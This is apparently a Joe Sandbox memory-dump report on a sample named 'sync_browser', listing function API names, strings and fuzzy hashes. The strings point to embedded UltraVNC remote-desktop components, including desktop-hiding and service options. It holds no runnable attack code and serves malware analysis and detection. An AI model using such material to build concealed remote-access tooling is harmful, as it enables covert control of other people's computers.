                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseQueryValue$Openlstrlenmalloc
                                                                    • String ID: @$Enterprise$Personal$ProductSuite$SBS$Small Business$System\CurrentControlSet\Control\ProductOptions$Terminal Server
                                                                    • API String ID: 1137168859-3840687832
                                                                    • Opcode ID: 54218e6667a4a9405651accdc3d5de267d2fa430744b7c07ceec9064bf014568
                                                                    • Instruction ID: c939408589478592f34954317c1b65852fbd0029e5c3eaeca208be7d1c499b02
                                                                    • Opcode Fuzzy Hash: 54218e6667a4a9405651accdc3d5de267d2fa430744b7c07ceec9064bf014568
                                                                    • Instruction Fuzzy Hash: 06411531A0C647C2EA10BB21B5402BAA7A5FF85BD4F844035EA8D56B7DDF2CF155CB60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$FullNamePath__doserrno_getdrive_invalid_parameter_noinfo
                                                                    • String ID: .$:.
                                                                    • API String ID: 2522281643-2811378331
                                                                    • Opcode ID: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
                                                                    • Instruction ID: ff8e06bc2a2888ee0431acb976af46f02149bda3833552d0a358df4f123707e0
                                                                    • Opcode Fuzzy Hash: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
                                                                    • Instruction Fuzzy Hash: 4B314D22A0C242C6FB697BA494003BDA6A0AF86744FD94135EB4C467EADF7CF8419771
                                                                    APIs
                                                                    Strings
                                                                    • x, xrefs: 00007FF740030A25
                                                                    • UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window, xrefs: 00007FF740030AAC
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Color$ObjectText$RectSelect$BitsBrushCreateDeleteDrawFillFlushSolid
                                                                    • String ID: UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window$x
                                                                    • API String ID: 3190128964-2508378015
                                                                    • Opcode ID: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
                                                                    • Instruction ID: df06870073bbf2b2af8524d66b86cb15e3d32fd3967436a2b8c7fa87234d0f7d
                                                                    • Opcode Fuzzy Hash: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
                                                                    • Instruction Fuzzy Hash: C531123660C686D6E700BF6AE45456AB361FF89B98F440032EE5E47728DF7CE445CB20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CombineCreateDeleteObjectRectfree$ErrorFreeHeapLast_errnomalloc
                                                                    • String ID: vistahook.cpp : REct %i %i %i %i
                                                                    • API String ID: 1305454473-3781348997
                                                                    • Opcode ID: d0ac63cbbbf134ee707a0d0b838e12a005fdeef02525ce0b9f81c8b524f91dbc
                                                                    • Instruction ID: f08612e0f41b372bccd3bd9e5855db3025e8681cb870ffca16b5a9bcd6795ba9
                                                                    • Opcode Fuzzy Hash: d0ac63cbbbf134ee707a0d0b838e12a005fdeef02525ce0b9f81c8b524f91dbc
                                                                    • Instruction Fuzzy Hash: 00E15976B08691CEE710EF69D4846ACB7F5FB48B88F404026DE4E93B28DB39E454CB51
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateWindow$Thread$CombineCursorDeleteDesktopForegroundFromObjectPointRectTime_errno_invalid_parameter_noinfofreetime
                                                                    • String ID: schook$w8hook
                                                                    • API String ID: 2828954817-2864610768
                                                                    • Opcode ID: 9d0d11ee87f8464a0e06aa43911e74bafefc4e8cee0f8ec7ee0a3e7d2bc7edc3
                                                                    • Instruction ID: 4682bb0146a826997d17208cbc33cb4110cf8fdfa6bd577bc31212ac350c5a45
                                                                    • Opcode Fuzzy Hash: 9d0d11ee87f8464a0e06aa43911e74bafefc4e8cee0f8ec7ee0a3e7d2bc7edc3
                                                                    • Instruction Fuzzy Hash: FDB1403660CB86C6EB65BF25E5405E9B7A0FB44B84F848036CA9D43769CF78F485C321
                                                                    APIs
                                                                    Strings
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF74001561C
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF74001564A
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF7400155BD
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF74001557A
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF74001577E
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF740015603
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                                    • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                                    • API String ID: 181403729-1081969236
                                                                    • Opcode ID: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
                                                                    • Instruction ID: 9558dfd3233c10f4d71ea6564156aa126e4990a8052f16c2e44999f5bd983c6e
                                                                    • Opcode Fuzzy Hash: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
                                                                    • Instruction Fuzzy Hash: 8D510762A1D582C1E719FB25A8502F8A391EF45745FC44039ED4E4B7A9EE3DF105C760
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$CloseCurrentDialogInformationInputObjectOpenParamUser
                                                                    • String ID: TextChat.cpp : !GetUserObjectInformation $TextChat.cpp : OpenInputdesktop Error $TextChat.cpp : OpenInputdesktop OK$TextChat.cpp : SelectHDESK to %s (%x) from %x$TextChat.cpp : SelectHDESK:!SetThreadDesktop
                                                                    • API String ID: 1907048692-1814171851
                                                                    • Opcode ID: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
                                                                    • Instruction ID: 1bc6a0d1e90b24fe3bc1eb7f1156ea7e3b51d8023c9543923abdf9f47b1e6e9f
                                                                    • Opcode Fuzzy Hash: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
                                                                    • Instruction Fuzzy Hash: 2A311761A1CA82C1EB25FB21B8146AAA3A5FF88744FC54036D98E47778DF3DF106C760
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$DesktopEnter$CloseInputInvalidateOpenRect
                                                                    • String ID: W$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 1769082246-4238595597
                                                                    • Opcode ID: 28edabc9feb7bdb14e1d1faffb3798e9d0b80a49f6f41662df86053fe061b59e
                                                                    • Instruction ID: f927ea2233521bd2267305b442883b63ffc37ebc86acdc85493d49d0d97719db
                                                                    • Opcode Fuzzy Hash: 28edabc9feb7bdb14e1d1faffb3798e9d0b80a49f6f41662df86053fe061b59e
                                                                    • Instruction Fuzzy Hash: CFE1AE32A0C6D1C5E754FB29C458BEDBBA1EB89B84F854036DA4C477A9CF39E841C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Enter$Leave
                                                                    • String ID: X$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 2801635615-1537001432
                                                                    • Opcode ID: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
                                                                    • Instruction ID: 485f79c4edfd0e8d3e1b1def6174e2c0c8a0077ea5af77a62fe8b5305f4e018a
                                                                    • Opcode Fuzzy Hash: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
                                                                    • Instruction Fuzzy Hash: 1ED1B122A0C691C5E750FB25C458BFEB7A1EB85B84F854139CA4D477B9CF39E885C720
                                                                    APIs
                                                                    Strings
                                                                    • HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF74000ABB9
                                                                    • HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF74000AC8A
                                                                    • HideDesktop.cpp : Restored SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF74000AC2F
                                                                    • HideDesktop.cpp : Failed to restore SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF74000AC17
                                                                    • HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF74000ABD4
                                                                    • HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF74000AC72
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorInfoLastParametersSystem
                                                                    • String ID: HideDesktop.cpp : Failed to restore SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Restored SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHINGTYPE: 0x%08x
                                                                    • API String ID: 2777246624-426764769
                                                                    • Opcode ID: be58b1c1191ffcc8586d2d23b3617e6acfb6b4a2149be82d11eb37b622f5d697
                                                                    • Instruction ID: 5cfd01ee38166f30c4e275c376ee00aed01c30f7cc7f372eaab16736206890a4
                                                                    • Opcode Fuzzy Hash: be58b1c1191ffcc8586d2d23b3617e6acfb6b4a2149be82d11eb37b622f5d697
                                                                    • Instruction Fuzzy Hash: A1314B60E0C647C6F724BB21B805BB9A7A1BF95748FC18035C44D567B8DE2CB90ACB71
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$LeaveObject$BitmapCompatibleCreateDeleteEnterSelect
                                                                    • String ID:
                                                                    • API String ID: 4219907860-0
                                                                    • Opcode ID: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                                    • Instruction ID: 783a7436ec44a876e483ec81b0f446716fa3a430b9134c6bd0dece0c3f05ad9e
                                                                    • Opcode Fuzzy Hash: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                                    • Instruction Fuzzy Hash: 1E41562161C692D6E720BF55A8446BAB360FF88BD8F405135DE5E47B68DF7CE104C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$FileModuleNameStringVersion
                                                                    • String ID: -service_run$_run$admin$clearconsole$kickrdp$service_commandline
                                                                    • API String ID: 769895750-1251308945
                                                                    • Opcode ID: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
                                                                    • Instruction ID: d21dc68d700a58afe32b2eddaf56d64dd9fb42db1dc2eb361ff8053895e5136b
                                                                    • Opcode Fuzzy Hash: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
                                                                    • Instruction Fuzzy Hash: D1519F21A0C686C5E750BB24B4402B9B7A0FB447A4F848336EABD537E9DF3CE505CB60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
